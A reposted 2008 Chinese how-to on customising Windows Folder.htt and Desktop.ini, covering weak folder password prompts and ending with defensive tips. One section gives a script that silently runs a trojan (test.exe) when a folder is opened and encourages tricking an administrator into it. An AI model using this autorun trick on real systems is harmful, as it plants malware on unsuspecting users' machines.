分享
 
 
 

欢乐时光“病毒”文件的另类妙用

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

您还记得当初大名鼎鼎的“欢乐时光”病毒吗?感染该病毒的硬盘中会有多个Desktop.ini和Folder.htt文件,就算你删除了目录中的这两个文件,当你再次打开该目录时,它们又像幽灵一样出现了。

再问大家一个与此相关的问题:在Windows系统中,重复文件最多的什么呢?答案是Desktop.ini文件!在Windows目录及其下的Favorites、System、Fonts、Tasks文件夹中都有该文件的身影!正是由于该文件的存在,使得它们在外观或其他方面也与普通的文件夹有所区别。下面笔者就谈谈这两个文件的一些奇妙用途。

一、给文件夹加上密码

在学校的机房和校园网络的管理中,是否经常会碰到这样的情况:一些计算机常因学生误删了Windows目录或SYSTEM目录下的一些系统文件而导致无法正常启动。是否有方法可以把Windows及其它重要目录保护起来呢?方法是有的,我们只需在这个Folder.htt文件中进行必要的修改,就可改变文件夹打开的方式。比如,要想在打开该文件夹前先进行安全认证,可这样修改这个Folder.htt。

在C盘的Windows文件夹中找到Folder.htt文件(该文件为隐藏文件,并且后来经过编辑与笔者共同验证,该文件不同的系统内容也不尽相同,本文种主要是Windows 98下的),打开Folder.htt文件。找到以下内容:

<a href=\'\'class=command onclick=\'ShowFiles(); ShowWinStat(winStat); return false;\' onMouseOver=\'ShowWinStat(!winStat); return true;\' onMouseOut=\'ShowWinStat(winStat); return true;\' onFocus=\'ShowWinStat(!winStat); return true;\' onBlur=\'ShowWinStat(winStat); return true;\'>显示文件</a>。";

将其修改为:

<a href=\'\'class=command onclick=\'ShowFiles(); ShowWinStat(winStat); return false;\' onMouseOver=\'ShowWinStat(!winStat); return true;\' onMouseOut=\'ShowWinStat(winStat); return true;\' onFocus=\'ShowWinStat(!winStat); return true;\'

onBlur=\'ShowWinStat(winStat); return true;\'>输入密码</a>。";

(2)找到function ShowFiles() {

Info.innerHTML = L_Intro_Text + "<br><br>" + L_Prompt_Text;

showFiles = true;

document.all.FileList.style.display = "";

document.all.Brand.style.display = "none";

FixSize();

}

修改为: ★function ShowFiles()

{var password=prompt("请输入密码:","");

if (password=="你的密码"){Info.innerHTML = L_Intro_Text + "<br><br>" + L_Prompt_Text;

showFiles = true;

document.all.FileList.style.display = "";

document.all.Brand.style.display = "none";

FixSize();}

else{alert("警告,密码错误!您无权浏览该目录");}}

(3)保存修改后的Folder.htt文件,退出Windows文件夹。

完成上述操作步骤后,再进入Windows目录时,系统提示输入密码,只有输入正确的密码才能进行该目录。通过修改打开行为的代码,就可实现对某个目录的简单加密。

当然,这种加密目录很容易解开:不使用Web方式打开文件夹,避开执行该程序,或直接从DOS中进入该文件夹都可绕开密码的输入。

如果你使用的是Windows 2000系统,可以找到

………………

<script language="JavaScript">

然后在后面加上以下代码:

var pass =prompt("enter the password")

if (pass!="密码")

{window.location="d:"}

就可以给文件夹加上访问口令!这样你的文件夹就多了一层保护。

二、任意文件夹和硬盘分区的保护

根据同样的原理,我们可对任意文件夹及硬盘分区设置保护口今。具体操作步骤如下:

(1)打开要加密的文件夹或硬盘分区,选择文件菜单中的“查看→自定义文件夹”。

(2)在打开的“自定义文件夹”窗口中,如图1所示选择“创建或编辑HTML文档”,单击“下一步”按钮,再单击“下一步”按钮,关闭记事本编辑窗口,单击“完成”按钮。在当C盘Windows目录下找到Folder.htt文件,把它复制到当前文件夹中,覆盖原来的Folder.htt文件。

(3)打开Folder.htt文件,找到★var L_Intro_Text= "<b><font color=red>警告</font></b><br><br>修改该文件夹的内容可能导致程序运行不正常。";★(警告内容),将其修改为“自定义的内容”。完成Folder.htt的文件修改后,再进入相应的文件夹或硬盘分区,则需要提供正确口令,否则无法显示该文件夹的内容。

图1

(一)、利用文件夹安装木马

黑客可以利用文件夹来安装木马,其目的是对方只要打开某个文件夹就自动安装木马文件。知己知彼方能百战不殆,让我们了解一下其原理和方法。

图2

1.先在以目录下建立一个文件夹test文件夹,进入刚建的文件夹test点击“工具”菜单选择“文件夹选项”项(图2);出来文件夹选项对话框如图所示(图3),把“隐藏受保护的操作系统文件(推荐)”前面打上“√”,接着出现一个警告窗口,如图所示(图4),直接点击“是”。再把“隐藏文件和文件夹”下选择“显示所有文件和文件夹”,最后点击确定在本目录下出现了Folder settings隐藏文件夹和Desttop.ini隐藏文件如图所示(图5)。

图3

图4

图5

2.现在点击“查看”菜单选择“自定义文件夹”项(图6),打开的“自定义文件夹”窗口,选择其中的“创建或编辑HTML文档”,单击“下一步”按钮,再单击“下一步”按钮,然后关闭记事本编辑窗口,单击“完成”按钮,就把文件夹设置成按WEB方式打开文件夹。再打开要放木马的文件夹,我们就在这个文件夹里测试。Folder.Htt是文件夹的模板文件,现在我们修改文件夹的模板文件,在里面插入一端自动运行程序的代码:

<script language="javascript">

run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""

run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">"

run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"

run_exe+="</OBJECT>"

document.open();

document.clear();

document.writeln(run_exe);

document.close();

</script>

图6

就是这段里面的test.exe为你要安装的木马文件,这里为了给大家看到效果我运行的是LC4。

3.现在我们把要运行的test.exe文件也copy到这个文件夹里,好了,我们现在把文件查看属性修改回去,就是步骤1的逆过程。

4.OK,如果你不想要木马立即运行,请把窗口直接关闭,等管理员来运行吧。让我们来看看效果,退出test文件夹然后双击test文件夹图标,如图所示(图7),怎么样,运行了吧,大家可以把test.exe换成小点的木马,这样对方就在不知道的情况下给自己装了木马。其实大家如果要有什么文件要隐藏的话,就可以放到folder.htt和同目录下,把文件夹属性设置回去以后,用搜索都找不到这个文件。

图7

三、总结

好了,Folder.htt和Desktop.ini文件的好的应用和需要注意的都讲了,是不是觉得很有意思也很恐怖哦!现在我们说一下防范与解决办法:

1.查看文件夹时,去掉以“Web页方式”的选项。虽然我们看不见什么个性化目录了,但我们换来是安全,我认为值!但是,也请大家注意,如果不采用“WEB方式”查看文件夹前面介绍过的技巧和应用就不能正常显示了,有得就有失啊。

2.如果没有什么需要,去掉默认共享和共享目录。要是需要,公共用户也要加上密码,密码只有内部人知道。只要能上传文件,你的机器就很危险。除了上边的方法,还可以用MIME漏洞,ASP漏洞入侵,如果是Windows 98还有共享方法。所以一定要把好关!

3.脚本病毒的一大特征就是利用WSH。要是服务器最好去掉WSH,这样能低御许多脚本病毒。方法是:在“控制面板”里选择“添加/删除程序”,选择“Windows安装程序”里的附件,再选择“详细资料”中的“Windows Scripting Host”把它卸载掉。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有